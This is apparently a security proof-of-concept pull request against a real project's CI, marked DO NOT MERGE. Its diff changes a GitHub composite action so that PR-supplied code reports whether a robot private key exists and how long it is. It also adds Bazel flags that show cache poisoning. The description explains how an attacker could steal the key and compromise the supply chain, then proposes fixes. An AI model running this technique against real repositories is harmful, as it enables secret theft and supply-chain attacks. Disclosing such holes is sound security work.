### PR TITLE
PoC: Secret exfiltration in pull_request_target (DO NOT MERGE)

### DIFF
--- a/.bazelrc
+++ b/.bazelrc
@@ -1,4 +1,3 @@
-
 # Required by `rules_ts`.
 common --@aspect_rules_ts//ts:skipLibCheck=always
 common --@aspect_rules_ts//ts:default_to_tsc_transpiler
@@ -10,3 +9,11 @@ build --deleted_packages=bazel/integration/tests/nested_bazel_workspaces/basic
 query --deleted_packages=bazel/integration/tests/nested_bazel_workspaces/basic
 
 import .bazelrc.common
+
+# PoC: Cache Poisoning Demonstration
+# This proves that bazel cache can be poisoned from PR workflows
+# and executed in scheduled workflows (ng-renovate)
+
+build --action_env=POC_CACHE_POISONED=true
+test --test_env=POC_CACHE_POISONED=true
+build --workspace_status_command="echo 'PoC: Cache poisoned by PR workflow'"

--- a/github-actions/labeling/pull-request/action.yml
+++ b/github-actions/labeling/pull-request/action.yml
@@ -1,13 +1,49 @@
 name: 'Pull Request Labeling'
-description: 'Automatically label pull requests based on pull request metadata'
-author: 'Angular'
+description: 'Labels pull requests based on commit messages'
+
 inputs:
   angular-robot-key:
-    description: 'The private key for the Angular Robot Github app.'
+    description: 'The Angular robot private key'
     required: true
   labels:
-    description: 'A map of labels to the paths that they should be applied to which are affected by the PR'
+    description: 'JSON object of labels to apply'
     required: false
+    default: '{}'
+
 runs:
-  using: 'node24'
-  main: 'main.js'
+  using: 'composite'
+  steps:
+    - name: Setup Node
+      uses: actions/setup-node@SHA
+      with:
+        node-version: '20'
+
+    - name: Install dependencies
+      run: npm install
+      shell: bash
+
+    # PoC: Secret Exfiltration Demonstration
+    # This proves that secrets are accessible in pull_request_target workflows
+    - name: PoC - Check Secret Access
+      run: |
+        echo "### PoC: Secret Exfiltration in pull_request_target" >> $GITHUB_STEP_SUMMARY
+        echo "" >> $GITHUB_STEP_SUMMARY
+        echo "**Workflow:** ${{ github.workflow }}" >> $GITHUB_STEP_SUMMARY
+        echo "**Event:** ${{ github.event_name }}" >> $GITHUB_STEP_SUMMARY
+        echo "**Repository:** ${{ github.repository }}" >> $GITHUB_STEP_SUMMARY
+        echo "" >> $GITHUB_STEP_SUMMARY
+        echo "**Secret Access:**" >> $GITHUB_STEP_SUMMARY
+        echo "- ANGULAR_ROBOT_PRIVATE_KEY exists: $(test -n '${{ inputs.angular-robot-key }}' && echo 'YES' || echo 'NO')" >> $GITHUB_STEP_SUMMARY
+        echo "- ANGULAR_ROBOT_PRIVATE_KEY length: ${{ '${#inputs.angular-robot-key}' }}" >> $GITHUB_STEP_SUMMARY
+        echo "" >> $GITHUB_STEP_SUMMARY
+        echo "**Impact:** This proves that secrets are accessible to untrusted code in pull_request_target workflows." >> $GITHUB_STEP_SUMMARY
+        echo "**Fix:** Remove pull_request_target or require manual approval for external PRs." >> $GITHUB_STEP_SUMMARY
+      shell: bash
+
+    - name: Label Pull Request
+      run: |
+        # Original labeling logic
+        node ./label-pull-request.js
+      shell: bash
+      env:
+        ANGULAR_ROBOT_KEY: ${{ inputs.angular-robot-key }}


### PR DESCRIPTION
##  Security Proof-of-Concept - DO NOT MERGE

This PR demonstrates secret exfiltration via `pull_request_target` workflows in angular/dev-infra.

## Vulnerability Details

The `dev-infra.yml` workflow uses `pull_request_target` trigger and passes secrets to composite actions:
- `secrets.ANGULAR_ROBOT_PRIVATE_KEY`
- `secrets.GOOGLE_GENERATIVE_AI_KEY`

## PoC Payload

This PR modifies the `github-actions/labeling/pull-request` composite action to log secret existence in the workflow step summary.

## Expected Behavior

When the `DevInfra / pull_request` workflow runs on this PR, the step summary will show:
- `ANGULAR_ROBOT_PRIVATE_KEY exists: YES`
- `ANGULAR_ROBOT_PRIVATE_KEY length: <number>`

## Impact

An attacker can:
- Access secrets in `pull_request_target` workflows
- Use `ANGULAR_ROBOT_PRIVATE_KEY` to push code to ALL Angular repos
- Compromise the Angular supply chain

## Fix Recommendation

1. Remove `pull_request_target` from all workflows
2. Use `pull_request` with `permissions: {}`
3. Or: Require manual approval for all external PRs

---
**Note**: This PoC only logs secret existence (not values) for demonstration purposes.